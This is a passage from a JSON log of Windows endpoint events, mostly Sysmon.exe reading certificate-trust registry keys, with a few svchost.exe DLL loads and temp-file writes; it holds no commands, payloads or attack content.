"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ResourcePolicyClient.dll", - "image_path": "C:\\Windows\\System32\\ResourcePolicyClient.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901840000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "file", - "file_name": "BIT6BFA.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\BIT6BFA.tmp", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "file", - "file_name": 
"BIT6BFA.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temp\\BIT6BFA.tmp", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "vssapi.dll", - "image_path": "C:\\Windows\\System32\\vssapi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901990000, - 
"unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570902770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 